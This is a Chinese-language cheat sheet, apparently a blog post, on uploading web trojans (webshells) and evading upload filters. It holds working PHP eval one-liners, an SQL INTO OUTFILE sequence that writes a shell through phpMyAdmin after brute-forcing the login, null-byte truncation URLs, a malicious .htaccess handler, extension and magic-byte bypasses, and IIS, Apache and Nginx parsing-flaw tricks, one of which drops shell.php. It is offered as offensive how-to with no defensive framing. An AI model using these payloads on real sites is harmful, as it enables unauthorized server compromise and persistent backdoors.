网页木马常见上传及绕过方法

一、正常上传

织梦cms ,谷歌关键字powered by dedecms, 根据版本找漏洞。

二、数据库备份

良通精用cms,上传一个带马的图片然后数据库备份为.asp或.php文件

三、配置文件插马

这个最好有一个网站源码测试,不然容易把网站搞坏。在有源码的情况下可以结合findstr /s命令找到网站配置文件位置。

四、数据库命令管理拿shell

常见的phpmyadmin后台,暴力破解用户名密码。
create table xxx (cmd text NOT NULL)
insert into xxx (cmd) values ('<?php eval($_POST[xx]);?>')
select cmd from xxx into outfile 'e:/phpstudy/www/xx.php'
drop table if exits xxx

五、客户端检测绕过(javascript检测)

检测脚本在本地,在没有上传到服务器时,就拒绝。
上传一个正常的后缀,然后burp抓包,改包上传。

六、服务端检测绕过(MIME类型检测)

服务端检测上传文件的类型
上传图片马,或者,burp抓包改content-type:image/gif

七、服务器端检测绕过(目录路径检测)

因为对目录路径的检测不够严谨导致可以用0x00截断攻击
例如:
fckeditor264/filemanager/connectors/php/connector.php?Command=fileupload&type=image¤tfolder=xxx.php%00.fig

八、服务端检测绕过(文件扩展名检测)

1.大小写绕过

2.名单列表绕过,如php2、php3、php5、phtml、asp、aspx、ascx、
ashx、cer、asa、jsp、jspx、cdx

3.特殊文件名绕过

burp抓包,修改文件名test.asp.或test.asp* (*为空格)适用于windows服务器因为这种命名windows不允许。

4.0×00截断绕过

5.htaccess文件攻击

配和名单列表绕过,上传一个自定义的.htaccess覆盖原有的文件,,绕过检测。
通过下面代码就可以解析xxx.jpg文件
<FilesMatch “xxx.jpg”>
SetHandler application/x-httpd-php
</FilesMatch>

6 .解析漏洞绕过详见“十”

九、服务端检测绕过(文件内容检测)

1.文件幻数检测

在一句话木马后面加上文件幻数
或者图片马
Jpg : FF D8 FF E0 00 10 4A 46 49 46
Gif :47 49 46 38 39 61
Png :89594447

2.文件信息检测

这个检测的更多,文件幻数后面加其他内容。
利用方法:图片马,或者在文件幻数后面加更多东西

十、解析漏洞:

1.Apache解析漏洞

版本2.0.59,2.2.6,2.2.8,2.2.11,2.2.17
文件扩展名从后往前解析

2.iis6.0解析漏洞

.asa、.cer、.cdx会被解析为asp
目录文件夹保护”.asp”字符串,这个文件夹下所有文件都会按asp解析。
文件名中含有”.asp;”,会优先按asp来解析,上传xx.asp;jpg。

3.iis7.0、7.5(php-cgi)

在URL后面追加字符串“/任意文件名.php”就好按php的方式解析
如:在默认Fast-CGI开启状况下,上传一个名字为wooyun.jpg,内容为
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
然后访问wooyun.jpg/x.php,在这个目录下就会生成一句话木马 shell.php

4.Nginx解析漏洞(php-cgi)

版本:0.5*,0.6*,0.7-0.7.65,0.8-0.8.37(与iss7.0漏洞相似)
任意文件名/任意文件名.php
任意文件名%00.php

发表评论

邮箱地址不会被公开。 必填项已用*标注